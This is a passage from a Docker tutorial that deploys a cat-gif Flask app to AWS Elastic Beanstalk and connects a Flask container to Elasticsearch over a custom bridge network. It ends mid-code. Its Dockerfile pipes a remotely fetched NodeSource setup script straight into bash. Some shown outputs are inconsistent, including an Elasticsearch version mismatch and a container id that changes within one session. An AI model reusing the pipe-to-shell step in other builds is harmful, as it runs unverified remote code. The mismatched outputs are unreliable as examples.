If you don't have the python:3.8 image, the client will first pull the image and then create your image. Hence, your output from running the command will look different from mine. If everything went well, your image should be ready! Run docker images and see if your image shows.
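The "Using cache" lines in the build output above come from Docker's layer cache. As a rough mental model (a simplification, not Docker's actual algorithm), the first step whose inputs changed is rebuilt, and so is every step after it. The Python sketch below applies that model to two orderings of the same instructions. The file set and the second ordering are assumptions made for illustration.

```python
def rebuilt_steps(steps, changed_files):
    """Return the instructions that re-run after some files change.

    steps is a list of (instruction, files_read) pairs. Simplified model:
    the first step that reads a changed file misses the cache, and so does
    every step after it.
    """
    for index, (_, files_read) in enumerate(steps):
        if files_read & changed_files:
            return [instruction for instruction, _ in steps[index:]]
    return []  # nothing changed, so every step comes from the cache


APP_FILES = {"app.py", "requirements.txt"}  # hypothetical build context

# Order used in the Dockerfile above: copy everything, then install.
tutorial_order = [
    ("FROM python:3.8", set()),
    ("WORKDIR /usr/src/app", set()),
    ("COPY . .", APP_FILES),
    ("RUN pip install --no-cache-dir -r requirements.txt", set()),
    ("EXPOSE 5000", set()),
    ('CMD ["python", "./app.py"]', set()),
]

# Alternative order (an assumption): copy requirements.txt first.
deps_first_order = [
    ("FROM python:3.8", set()),
    ("WORKDIR /usr/src/app", set()),
    ("COPY requirements.txt .", {"requirements.txt"}),
    ("RUN pip install --no-cache-dir -r requirements.txt", set()),
    ("COPY . .", APP_FILES),
    ("EXPOSE 5000", set()),
    ('CMD ["python", "./app.py"]', set()),
]

edited = {"app.py"}
after_edit_tutorial = rebuilt_steps(tutorial_order, edited)
after_edit_deps_first = rebuilt_steps(deps_first_order, edited)
print(after_edit_tutorial)
print(after_edit_deps_first)
```

Under this model, editing only app.py re-runs pip install with the first ordering but not with the second, which is why many Dockerfiles copy the dependency list before the rest of the code.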

The last step in this section is to run the image and see if it actually works (replacing my username with yours).

$ docker run -p 8888:5000 yourusername/catnip
 * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)

The command we just ran used port 5000 for the server inside the container and exposed this externally on port 8888. Head over to the URL with port 8888, where your app should be live.
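The -p 8888:5000 argument reads as HOST_PORT:CONTAINER_PORT. The short Python sketch below spells that out and builds the URL to open in a browser. The helper names are hypothetical, and only the two-part form used in this tutorial is handled.

```python
def parse_publish(spec):
    """Split a '-p HOST:CONTAINER' value into two integer ports."""
    host_port, container_port = spec.split(":")
    return int(host_port), int(container_port)


def local_url(spec, host="localhost"):
    """URL on the host machine that reaches the published container port."""
    host_port, _ = parse_publish(spec)
    return f"http://{host}:{host_port}/"


host_port, container_port = parse_publish("8888:5000")
print(f"host port {host_port} forwards to container port {container_port}")
print(local_url("8888:5000"))
```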

cat gif website

Congratulations! You have successfully created your first docker image.

Docker on AWS

What good is an application that can't be shared with friends, right? So in this section we are going to see how we can deploy our awesome application to the cloud so that we can share it with our friends! We're going to use AWS Elastic Beanstalk to get our application up and running in a few clicks. We'll also see how easy it is to make our application scalable and manageable with Beanstalk!

Docker push

The first thing that we need to do before we deploy our app to AWS is to publish our image on a registry which can be accessed by AWS. There are many different Docker registries you can use (you can even host your own). For now, let's use Docker Hub to publish the image.

If this is the first time you are pushing an image, the client will ask you to login. Provide the same credentials that you used for logging into Docker Hub.

$ docker login
Login with your Docker ID to push and pull images from Docker Hub. If you do not have a Docker ID, head over to https://hub.docker.com to create one.
Username: yourusername
Password:
WARNING! Your password will be stored unencrypted in /Users/yourusername/.docker/config.json
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/credential-store

Login Succeeded

To publish, just type the command below, remembering to replace the image name with yours. It is important to use the format yourusername/image_name so that the client knows where to publish.

$ docker push yourusername/catnip

Once that is done, you can view your image on Docker Hub. For example, here's the web page for my image.

Note: One thing that I'd like to clarify before we go ahead is that it is not imperative to host your image on a public registry (or any registry) in order to deploy to AWS. In case you're writing code for the next million-dollar unicorn startup you can totally skip this step. The reason why we're pushing our images publicly is that it makes deployment super simple by skipping a few intermediate configuration steps.

Now that your image is online, anyone who has docker installed can play with your app by typing just a single command.

$ docker run -p 8888:5000 yourusername/catnip

If you've pulled your hair out in setting up local dev environments / sharing application configuration in the past, you very well know how awesome this sounds. That's why Docker is so cool!

Beanstalk

AWS Elastic Beanstalk (EB) is a PaaS (Platform as a Service) offered by AWS. If you've used Heroku, Google App Engine etc. you'll feel right at home. As a developer, you just tell EB how to run your app and it takes care of the rest - including scaling, monitoring and even updates. In April 2014, EB added support for running single-container Docker deployments which is what we'll use to deploy our app. Although EB has a very intuitive CLI, it does require some setup, and to keep things simple we'll use the web UI to launch our application.

To follow along, you need a functioning AWS account. If you haven't already, please go ahead and do that now - you will need to enter your credit card information. But don't worry, it's free and anything we do in this tutorial will also be free! Let's get started.

Here are the steps:

Login to your AWS console.
Click on Elastic Beanstalk. It will be in the compute section on the top left. Alternatively, you can access the Elastic Beanstalk console.

Elastic Beanstalk start

Click on "Create New Application" in the top right
Give your app a memorable (but unique) name and provide an (optional) description
In the New Environment screen, create a new environment and choose the Web Server Environment.
Fill in the environment information by choosing a domain. This URL is what you'll share with your friends so make sure it's easy to remember.
Under the base configuration section, choose Docker from the predefined platform.

Elastic Beanstalk Environment Type

Now we need to upload our application code. But since our application is packaged in a Docker container, we just need to tell EB about our container. Open the Dockerrun.aws.json file located in the flask-app folder and edit the Name of the image to your image's name. Don't worry, I'll explain the contents of the file shortly. When you are done, click on the radio button for "Upload your Code", choose this file, and click on "Upload".
Now click on "Create environment". The final screen that you see will have a few spinners indicating that your environment is being set up. It typically takes around 5 minutes for the first-time setup.

While we wait, let's quickly see what the Dockerrun.aws.json file contains. This file is basically an AWS specific file that tells EB details about our application and docker configuration.

{
  "AWSEBDockerrunVersion": "1",
  "Image": {
    "Name": "prakhar1989/catnip",
    "Update": "true"
  },
  "Ports": [
    {
      "ContainerPort": 5000,
      "HostPort": 8000
    }
  ],
  "Logging": "/var/log/nginx"
}

The file should be pretty self-explanatory, but you can always reference the official documentation for more information. We provide the name of the image that EB should use along with a port that the container should open.
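If you would rather not edit the file by hand, the same structure can be generated with a few lines of Python. This is only a sketch: make_dockerrun is a hypothetical helper, and the values simply mirror the file shown above with the image name swapped for yours.

```python
import json


def make_dockerrun(image_name, container_port=5000, host_port=8000):
    """Build the single-container Dockerrun.aws.json structure shown above."""
    return {
        "AWSEBDockerrunVersion": "1",
        "Image": {"Name": image_name, "Update": "true"},
        "Ports": [{"ContainerPort": container_port, "HostPort": host_port}],
        "Logging": "/var/log/nginx",
    }


config = make_dockerrun("yourusername/catnip")
dockerrun_text = json.dumps(config, indent=2)
print(dockerrun_text)
```

Saving the printed text as Dockerrun.aws.json gives you a file you can upload in the step above.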

Hopefully by now, our instance should be ready. Head over to the EB page and you should see a green tick indicating that your app is alive and kicking.

EB deploy

Go ahead and open the URL in your browser and you should see the application in all its glory. Feel free to email / IM / snapchat this link to your friends and family so that they can enjoy a few cat gifs, too.

Cleanup

Once you're done basking in the glory of your app, remember to terminate the environment so that you don't end up getting charged for extra resources.

EB deploy

Congratulations! You have deployed your first Docker application! That might seem like a lot of steps, but with the command-line tool for EB you can almost mimic the functionality of Heroku in a few keystrokes! Hopefully, you agree that Docker takes away a lot of the pains of building and deploying applications in the cloud. I would encourage you to read the AWS documentation on single-container Docker environments to get an idea of what features exist.

In the next (and final) part of the tutorial, we'll up the ante a bit and deploy an application that mimics the real-world more closely; an app with a persistent back-end storage tier. Let's get straight to it!

MULTI-CONTAINER ENVIRONMENTS

In the last section, we saw how easy and fun it is to run applications with Docker. We started with a simple static website and then tried a Flask app. Both of which we could run locally and in the cloud with just a few commands. One thing both these apps had in common was that they were running in a single container.

Those of you who have experience running services in production know that apps nowadays are usually not that simple. There's almost always a database (or some other kind of persistent storage) involved. Systems such as Redis and Memcached have become de rigueur in most web application architectures. Hence, in this section we are going to spend some time learning how to Dockerize applications that rely on different services to run.

In particular, we are going to see how we can run and manage multi-container Docker environments. Why multi-container, you might ask? Well, one of the key points of Docker is the way it provides isolation. The idea of bundling a process with its dependencies in a sandbox (called a container) is what makes this so powerful.

Just like it's a good strategy to decouple your application tiers, it is wise to keep containers for each of the services separate. Each tier is likely to have different resource needs and those needs might grow at different rates. By separating the tiers into different containers, we can compose each tier using the most appropriate instance type based on different resource needs. This also plays very well with the whole microservices movement, which is one of the main reasons why Docker (or any other container technology) is at the forefront of modern microservices architectures.

SF Food Trucks

The app that we're going to Dockerize is called SF Food Trucks. My goal in building this app was to have something that is useful (in that it resembles a real-world application), relies on at least one service, but is not too complex for the purpose of this tutorial. This is what I came up with.

SF Food Trucks

The app's backend is written in Python (Flask) and for search it uses Elasticsearch. Like everything else in this tutorial, the entire source is available on Github. We'll use this as our candidate application for learning how to build, run and deploy a multi-container environment.

First up, let's clone the repository locally.

$ git clone https://github.com/prakhar1989/FoodTrucks
$ cd FoodTrucks
$ tree -L 2
.
├── Dockerfile
├── README.md
├── aws-compose.yml
├── docker-compose.yml
├── flask-app
│   ├── app.py
│   ├── package-lock.json
│   ├── package.json
│   ├── requirements.txt
│   ├── static
│   ├── templates
│   └── webpack.config.js
├── setup-aws-ecs.sh
├── setup-docker.sh
├── shot.png
└── utils
    ├── generate_geojson.py
    └── trucks.geojson

The flask-app folder contains the Python application, while the utils folder has some utilities to load the data into Elasticsearch. The directory also contains some YAML files and a Dockerfile, all of which we'll see in greater detail as we progress through this tutorial. If you are curious, feel free to take a look at the files.

Now that you're excited (hopefully), let's think of how we can Dockerize the app. We can see that the application consists of a Flask backend server and an Elasticsearch service. A natural way to split this app would be to have two containers - one running the Flask process and another running the Elasticsearch (ES) process. That way if our app becomes popular, we can scale it by adding more containers depending on where the bottleneck lies.

Great, so we need two containers. That shouldn't be hard right? We've already built our own Flask container in the previous section. And for Elasticsearch, let's see if we can find something on the hub.

$ docker search elasticsearch
NAME                              DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
elasticsearch                     Elasticsearch is a powerful open source se...   697       [OK]
itzg/elasticsearch                Provides an easily configurable Elasticsea...   17                   [OK]
tutum/elasticsearch               Elasticsearch image - listens in port 9200.     15                   [OK]
barnybug/elasticsearch            Latest Elasticsearch 1.7.2 and previous re...   15                   [OK]
digitalwonderland/elasticsearch   Latest Elasticsearch with Marvel & Kibana       12                   [OK]
monsantoco/elasticsearch          ElasticSearch Docker image                      9                    [OK]

Quite unsurprisingly, there exists an officially supported image for Elasticsearch. To get ES running, we can simply use docker run and have a single-node ES container running locally within no time.

Note: Elastic, the company behind Elasticsearch, maintains its own registry for Elastic products. It's recommended to use the images from that registry if you plan to use Elasticsearch.

Let's first pull the image

$ docker pull docker.elastic.co/elasticsearch/elasticsearch:6.3.2

and then run it in development mode by specifying ports and setting an environment variable that configures the Elasticsearch cluster to run as a single-node.

$ docker run -d --name es -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2
277451c15ec183dd939e80298ea4bcf55050328a39b04124b387d668e3ed3943

Note: If your container runs into memory issues, you might need to tweak some JVM flags to limit its memory consumption.

As seen above, we use --name es to give our container a name, which makes it easy to refer to in subsequent commands. Once the container is started, we can inspect its logs by running docker container logs with the container name (or ID). You should see logs similar to those below if Elasticsearch started successfully.

Note: Elasticsearch takes a few seconds to start so you might need to wait before you see initialized in the logs.

$ docker container ls
CONTAINER ID        IMAGE                                                 COMMAND                  CREATED             STATUS              PORTS                                            NAMES
277451c15ec1        docker.elastic.co/elasticsearch/elasticsearch:6.3.2   "/usr/local/bin/dock…"   2 minutes ago       Up 2 minutes        0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp   es

$ docker container logs es
[2018-07-29T05:49:09,304][INFO ][o.e.n.Node               ] [] initializing ...
[2018-07-29T05:49:09,385][INFO ][o.e.e.NodeEnvironment    ] [L1VMyzt] using [1] data paths, mounts [[/ (overlay)]], net usable_space [54.1gb], net total_space [62.7gb], types [overlay]
[2018-07-29T05:49:09,385][INFO ][o.e.e.NodeEnvironment    ] [L1VMyzt] heap size [990.7mb], compressed ordinary object pointers [true]
[2018-07-29T05:49:11,979][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded module [x-pack-security]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded module [x-pack-sql]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded module [x-pack-upgrade]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded module [x-pack-watcher]
[2018-07-29T05:49:11,981][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded plugin [ingest-geoip]
[2018-07-29T05:49:11,981][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded plugin [ingest-user-agent]
[2018-07-29T05:49:17,659][INFO ][o.e.d.DiscoveryModule    ] [L1VMyzt] using discovery type [single-node]
[2018-07-29T05:49:18,962][INFO ][o.e.n.Node               ] [L1VMyzt] initialized
[2018-07-29T05:49:18,963][INFO ][o.e.n.Node               ] [L1VMyzt] starting ...
[2018-07-29T05:49:19,218][INFO ][o.e.t.TransportService   ] [L1VMyzt] publish_address {172.17.0.2:9300}, bound_addresses {0.0.0.0:9300}
[2018-07-29T05:49:19,302][INFO ][o.e.x.s.t.n.SecurityNetty4HttpServerTransport] [L1VMyzt] publish_address {172.17.0.2:9200}, bound_addresses {0.0.0.0:9200}
[2018-07-29T05:49:19,303][INFO ][o.e.n.Node               ] [L1VMyzt] started
[2018-07-29T05:49:19,439][WARN ][o.e.x.s.a.s.m.NativeRoleMappingStore] [L1VMyzt] Failed to clear cache for realms [[]]
[2018-07-29T05:49:19,542][INFO ][o.e.g.GatewayService     ] [L1VMyzt] recovered [0] indices into cluster_state

Now, let's see if we can send a request to the Elasticsearch container. We use port 9200 to send a cURL request to the container.

$ curl 0.0.0.0:9200
{
  "name" : "ijJDAOm",
  "cluster_name" : "docker-cluster",
  "cluster_uuid" : "a_nSV3XmTCqpzYYzb-LhNw",
  "version" : {
    "number" : "6.3.2",
    "build_flavor" : "default",
    "build_type" : "tar",
    "build_hash" : "053779d",
    "build_date" : "2018-07-20T05:20:23.451332Z",
    "build_snapshot" : false,
    "lucene_version" : "7.3.1",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

Sweet! It's looking good! While we are at it, let's get our Flask container running too. But before we get to that, we need a Dockerfile. In the last section, we used the python:3.8 image as our base image. This time, however, apart from installing Python dependencies via pip, we want our application to also generate our minified JavaScript file for production. For this, we'll require Node.js. Since we need a custom build step, we'll start from the ubuntu base image to build our Dockerfile from scratch.

Note: if you find that an existing image doesn't cater to your needs, feel free to start from another base image and tweak it yourself. For most of the images on Docker Hub, you should be able to find the corresponding Dockerfile on Github. Reading through existing Dockerfiles is one of the best ways to learn how to roll your own.

Our Dockerfile for the flask app looks like below -

# start from base
FROM ubuntu:18.04

MAINTAINER Prakhar Srivastav <prakhar@prakhar.me>

# install system-wide deps for python and node
RUN apt-get -yqq update
RUN apt-get -yqq install python3-pip python3-dev curl gnupg
RUN curl -sL https://deb.nodesource.com/setup_10.x | bash
RUN apt-get install -yq nodejs

# copy our application code
ADD flask-app /opt/flask-app
WORKDIR /opt/flask-app

# fetch app specific deps
RUN npm install
RUN npm run build
RUN pip3 install -r requirements.txt

# expose port
EXPOSE 5000

# start app
CMD [ "python3", "./app.py" ]

Quite a few new things here, so let's quickly go over this file. We start off with the Ubuntu LTS base image and use the package manager apt-get to install the dependencies, namely Python and Node. The -yqq flag assumes "Yes" to all prompts (-y) and suppresses output (-qq).

We then use the ADD command to copy our application into a new directory in the container - /opt/flask-app. This is where our code will reside. We also set this as our working directory, so that the following commands will be run in the context of this location. Now that our system-wide dependencies are installed, we get around to installing app-specific ones. First off, we tackle Node by installing the packages from npm and running the build command as defined in our package.json file. We finish the file off by installing the Python packages, exposing the port and defining the CMD to run, as we did in the last section.

Finally, we can go ahead, build the image and run the container (replace yourusername with your username below).

$ docker build -t yourusername/foodtrucks-web .

On the first run, this will take some time as the Docker client downloads the ubuntu image, runs all the commands and prepares your image. Re-running docker build after subsequent changes to the application code will be much faster, since the steps before the ADD instruction (such as the apt-get installs) are served from the build cache. Now let's try running our app.

$ docker run -P --rm yourusername/foodtrucks-web
Unable to connect to ES. Retrying in 5 secs...
Unable to connect to ES. Retrying in 5 secs...
Unable to connect to ES. Retrying in 5 secs...
Out of retries. Bailing out...

Oops! Our flask app was unable to run since it was unable to connect to Elasticsearch. How do we tell one container about the other container and get them to talk to each other? The answer lies in the next section.
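The output above is a retry-then-give-up pattern: try to connect, wait, try again, and bail out after a fixed number of attempts. The Python sketch below shows the general shape of such a loop. It is not the app's actual code. wait_for_service and its parameters are hypothetical, and the connection check is passed in as a function so the example runs without Elasticsearch.

```python
import time


def wait_for_service(check, retries=3, delay=5.0, sleep=time.sleep):
    """Call check() until it returns True or the retries are used up."""
    for attempt in range(1, retries + 1):
        if check():
            return True
        print(f"Unable to connect (attempt {attempt}/{retries}). "
              f"Retrying in {delay:g} secs...")
        sleep(delay)
    print("Out of retries. Bailing out...")
    return False


# Simulated service that only answers on the third attempt.
answers = iter([False, False, True])
came_up = wait_for_service(lambda: next(answers), delay=0)

# Simulated service that never answers, like ES in the run above.
never_up = wait_for_service(lambda: False, delay=0)
print(came_up, never_up)
```

Retrying helps when the other service is merely slow to start. It cannot help here, because the Flask container has no way to reach the ES container at all yet.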

Docker Network

Before we talk about the features Docker provides especially to deal with such scenarios, let's see if we can figure out a way to get around the problem. Hopefully, this should give you an appreciation for the specific feature that we are going to study.

Okay, so let's run docker container ls (which is the same as docker ps) and see what we have.

$ docker container ls
CONTAINER ID        IMAGE                                                 COMMAND                  CREATED             STATUS              PORTS                                            NAMES
277451c15ec1        docker.elastic.co/elasticsearch/elasticsearch:6.3.2   "/usr/local/bin/dock…"   17 minutes ago      Up 17 minutes       0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp   es

So we have one ES container running, with its port published on 0.0.0.0:9200, which we can access directly. If we can tell our Flask app to connect to this URL, it should be able to connect and talk to ES, right? Let's dig into our Python code and see how the connection details are defined.

es = Elasticsearch(host='es')

To make this work, we need to tell the Flask container that the ES container is running on the 0.0.0.0 host (the port by default is 9200), and that should make it work, right? Unfortunately, that is not correct, since 0.0.0.0 is the address used to access the ES container from the host machine, i.e. from my Mac. Another container will not be able to reach it on the same IP address. Okay, if not that IP, then at which IP address is the ES container reachable? I'm glad you asked.

Now is a good time to start our exploration of networking in Docker. When docker is installed, it creates three networks automatically.

$ docker network ls
NETWORK ID          NAME                DRIVER              SCOPE
c2c695315b3a        bridge              bridge              local
a875bec5d6fd        host                host                local
ead0e804a67b        none                null                local

The bridge network is the network in which containers are run by default. So that means that when I ran the ES container, it was running in this bridge network. To validate this, let's inspect the network.

$ docker network inspect bridge
[
    {
        "Name": "bridge",
        "Id": "c2c695315b3aaf8fc30530bb3c6b8f6692cedd5cc7579663f0550dfdd21c9a26",
        "Created": "2018-07-28T20:32:39.405687265Z",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": null,
            "Config": [
                {
                    "Subnet": "172.17.0.0/16",
                    "Gateway": "172.17.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": false,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {
            "277451c15ec183dd939e80298ea4bcf55050328a39b04124b387d668e3ed3943": {
                "Name": "es",
                "EndpointID": "5c417a2fc6b13d8ec97b76bbd54aaf3ee2d48f328c3f7279ee335174fbb4d6bb",
                "MacAddress": "02:42:ac:11:00:02",
                "IPv4Address": "172.17.0.2/16",
                "IPv6Address": ""
            }
        },
        "Options": {
            "com.docker.network.bridge.default_bridge": "true",
            "com.docker.network.bridge.enable_icc": "true",
            "com.docker.network.bridge.enable_ip_masquerade": "true",
            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
            "com.docker.network.bridge.name": "docker0",
            "com.docker.network.driver.mtu": "1500"
        },
        "Labels": {}
    }
]

You can see that our container 277451c15ec1 is listed under the Containers section in the output. What we also see is the IP address this container has been allotted - 172.17.0.2. Is this the IP address that we're looking for? Let's find out by running our flask container and trying to access this IP.

$ docker run -it --rm yourusername/foodtrucks-web bash
root@35180ccc206a:/opt/flask-app# curl 172.17.0.2:9200
{
  "name" : "Jane Foster",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "2.1.1",
    "build_hash" : "40e2c53a6b6c2972b3d13846e450e66f4375bd71",
    "build_timestamp" : "2015-12-15T13:05:55Z",
    "build_snapshot" : false,
    "lucene_version" : "5.3.1"
  },
  "tagline" : "You Know, for Search"
}
root@35180ccc206a:/opt/flask-app# exit

This should be fairly straightforward to you by now. We start the container in interactive mode with the bash process. The --rm flag is convenient for running one-off commands since the container gets cleaned up when its work is done. We then try a curl (it is already available because our Dockerfile installs it) and see that we can indeed talk to ES on 172.17.0.2:9200. Awesome!
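We found the container's IP by reading the docker network inspect output by eye. The same lookup can be scripted, since the output is plain JSON. Below is a minimal Python sketch. container_ips is a hypothetical helper, and SAMPLE is a trimmed copy of the output shown earlier.

```python
import json


def container_ips(inspect_json):
    """Map container name -> IPv4 address from network inspect output."""
    ips = {}
    for network in json.loads(inspect_json):
        for info in (network.get("Containers") or {}).values():
            # IPv4Address carries a prefix length, e.g. "172.17.0.2/16".
            ips[info["Name"]] = info["IPv4Address"].split("/")[0]
    return ips


# Trimmed copy of the `docker network inspect bridge` output above.
SAMPLE = """
[
    {
        "Name": "bridge",
        "Containers": {
            "277451c15ec183dd939e80298ea4bcf55050328a39b04124b387d668e3ed3943": {
                "Name": "es",
                "IPv4Address": "172.17.0.2/16"
            }
        }
    }
]
"""

addresses = container_ips(SAMPLE)
print(addresses)
```

On a machine with Docker running, the JSON text could come from subprocess.run(["docker", "network", "inspect", "bridge"], capture_output=True, text=True).stdout instead of the sample string.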

Although we have figured out a way to make the containers talk to each other, there are still two problems with this approach -

How do we tell the Flask container that es hostname stands for 172.17.0.2 or some other IP since the IP can change?
Since the bridge network is shared by every container by default, this method is not secure. How do we isolate our network?

The good news is that Docker has a great answer to our questions. It allows us to define our own networks while keeping them isolated using the docker network command.

Let's first go ahead and create our own network.

$ docker network create foodtrucks-net
0815b2a3bb7a6608e850d05553cc0bda98187c4528d94621438f31d97a6fea3c

$ docker network ls
NETWORK ID          NAME                DRIVER              SCOPE
c2c695315b3a        bridge              bridge              local
0815b2a3bb7a        foodtrucks-net      bridge              local
a875bec5d6fd        host                host                local
ead0e804a67b        none                null                local

The network create command creates a new bridge network, which is what we need at the moment. In terms of Docker, a bridge network uses a software bridge which allows containers connected to the same bridge network to communicate, while providing isolation from containers which are not connected to that bridge network. The Docker bridge driver automatically installs rules in the host machine so that containers on different bridge networks cannot communicate directly with each other. There are other kinds of networks that you can create, and you are encouraged to read about them in the official docs.
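Each bridge network gets its own address range. The Python sketch below uses the standard ipaddress module to tell which network an address belongs to. The default bridge's subnet is taken from the inspect output above. The 172.18.0.0/16 range for foodtrucks-net is an assumption (Docker picks the actual range). Note that the isolation itself is enforced by rules Docker installs on the host, not by this arithmetic.

```python
import ipaddress

NETWORKS = {
    "bridge": ipaddress.ip_network("172.17.0.0/16"),
    # Assumed range for the user-defined network; check with
    # `docker network inspect foodtrucks-net` on your machine.
    "foodtrucks-net": ipaddress.ip_network("172.18.0.0/16"),
}


def network_of(ip):
    """Return the name of the known network containing ip, or None."""
    address = ipaddress.ip_address(ip)
    for name, subnet in NETWORKS.items():
        if address in subnet:
            return name
    return None


print(network_of("172.17.0.2"))
print(network_of("172.18.0.2"))
```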

Now that we have a network, we can launch our containers inside this network using the --net flag. Let's do that - but first, in order to launch a new container with the same name, we will stop and remove our ES container that is running in the bridge (default) network.

$ docker container stop es
es

$ docker container rm es
es

$ docker run -d --name es --net foodtrucks-net -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2
13d6415f73c8d88bddb1f236f584b63dbaf2c3051f09863a3f1ba219edba3673

$ docker network inspect foodtrucks-net
[
    {
        "Name": "foodtrucks-net",
        "Id": "0815b2a3bb7a6608e850d05553cc0bda98187c4528d94621438f31d97a6fea3c",
        "Created": "2018-07-30T00:01:29.1500984Z",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": {},
            "Config": [
                {
                    "Subnet": "172.18.0.0/16",
                    "Gateway": "172.18.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": false,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {
            "13d6415f73c8d88bddb1f236f584b63dbaf2c3051f09863a3f1ba219edba3673": {
                "Name": "es",
                "EndpointID": "29ba2d33f9713e57eb6b38db41d656e4ee2c53e4a2f7cf636bdca0ec59cd3aa7",
                "MacAddress": "02:42:ac:12:00:02",
                "IPv4Address": "172.18.0.2/16",
                "IPv6Address": ""
            }
        },
        "Options": {},
        "Labels": {}
    }
]
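
Since the inspect output is plain JSON, the same facts can be read programmatically. The following is a minimal sketch, assuming the output of docker network inspect foodtrucks-net has been captured into a string. The sample is abbreviated from the output above, and the helper name containers_on_network is hypothetical.

```python
import ipaddress
import json

# Abbreviated copy of the `docker network inspect foodtrucks-net` output above.
INSPECT_OUTPUT = """
[
    {
        "Name": "foodtrucks-net",
        "Driver": "bridge",
        "IPAM": {"Config": [{"Subnet": "172.18.0.0/16", "Gateway": "172.18.0.1"}]},
        "Containers": {
            "13d6415f73c8d88bddb1f236f584b63dbaf2c3051f09863a3f1ba219edba3673": {
                "Name": "es",
                "IPv4Address": "172.18.0.2/16"
            }
        }
    }
]
"""


def containers_on_network(inspect_json):
    """Map container name -> IPv4 address for the first network in the output."""
    network = json.loads(inspect_json)[0]
    subnet = ipaddress.ip_network(network["IPAM"]["Config"][0]["Subnet"])
    result = {}
    for info in network["Containers"].values():
        # "172.18.0.2/16" is parsed as an interface; .ip drops the prefix length.
        address = ipaddress.ip_interface(info["IPv4Address"]).ip
        if address not in subnet:
            raise ValueError(f"{info['Name']} is outside {subnet}")
        result[info["Name"]] = str(address)
    return result


if __name__ == "__main__":
    print(containers_on_network(INSPECT_OUTPUT))
```

Every container attached to the network should report an address inside the network's subnet, which is what the membership check verifies.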

As you can see, our es container is now running inside the foodtrucks-net bridge network. Now let's inspect what happens when we launch our Flask container in the foodtrucks-net network.

$ docker run -it --rm --net foodtrucks-net yourusername/foodtrucks-web bash
root@9d2722cf282c:/opt/flask-app# curl es:9200
{
  "name" : "wWALl9M",
  "cluster_name" : "docker-cluster",
  "cluster_uuid" : "BA36XuOiRPaghPNBLBHleQ",
  "version" : {
    "number" : "6.3.2",
    "build_flavor" : "default",
    "build_type" : "tar",
    "build_hash" : "053779d",
    "build_date" : "2018-07-20T05:20:23.451332Z",
    "build_snapshot" : false,
    "lucene_version" : "7.3.1",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}
root@53af252b771a:/opt/flask-app# ls
app.py  node_modules  package.json  requirements.txt  static  templates  webpack.config.js
root@53af252b771a:/opt/flask-app# python3 app.py
Index not found...
Loading data in elasticsearch ...
Total trucks loaded:  733
 * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
root@53af252b771a:/opt/flask-app# exit

Wohoo! That works! On user-defined networks like foodtrucks-net, containers can not only communicate by IP address, but can also resolve a container name to an IP address. This capability is called automatic service discovery. Great! Let's launch our Flask container for real now -

$ docker run -d --net foodtrucks-net -p 5000:5000 --name foodtrucks-web yourusername/foodtrucks-web
852fc74de2954bb72471b858dce64d764181dca0cf7693fed201d76da33df794

$ docker container ls
CONTAINER ID        IMAGE                                                 COMMAND                  CREATED              STATUS              PORTS                                            NAMES
852fc74de295        yourusername/foodtrucks-web                           "python3 ./app.py"       About a minute ago   Up About a minute   0.0.0.0:5000->5000/tcp                           foodtrucks-web
13d6415f73c8        docker.elastic.co/elasticsearch/elasticsearch:6.3.2   "/usr/local/bin/dock…"   17 minutes ago       Up 17 minutes       0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp   es

$ curl -I 0.0.0.0:5000
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 3697
Server: Werkzeug/0.11.2 Python/2.7.6
Date: Sun, 10 Jan 2016 23:58:53 GMT

Head over to http://0.0.0.0:5000 and see your glorious app live! Although that might have seemed like a lot of work, we actually just typed 4 commands to go from zero to running. I've collated the commands in a bash script.

#!/bin/bash

# build the flask container
docker build -t yourusername/foodtrucks-web .

# create the network
docker network create foodtrucks-net

# start the ES container
docker run -d --name es --net foodtrucks-net -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2

# start the flask app container
docker run -d --net foodtrucks-net -p 5000:5000 --name foodtrucks-web yourusername/foodtrucks-web
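
For readers who would rather drive Docker from Python, the same four steps could be sketched as below. This is an illustration under assumptions, not something that ships with the FoodTrucks repo: the function names are hypothetical, and the script defaults to a dry run that only prints the commands.

```python
import shlex
import subprocess

ES_IMAGE = "docker.elastic.co/elasticsearch/elasticsearch:6.3.2"


def build_commands(image="yourusername/foodtrucks-web", network="foodtrucks-net"):
    """Return the four docker invocations from the bash script as argv lists."""
    return [
        ["docker", "build", "-t", image, "."],
        ["docker", "network", "create", network],
        ["docker", "run", "-d", "--name", "es", "--net", network,
         "-p", "9200:9200", "-p", "9300:9300",
         "-e", "discovery.type=single-node", ES_IMAGE],
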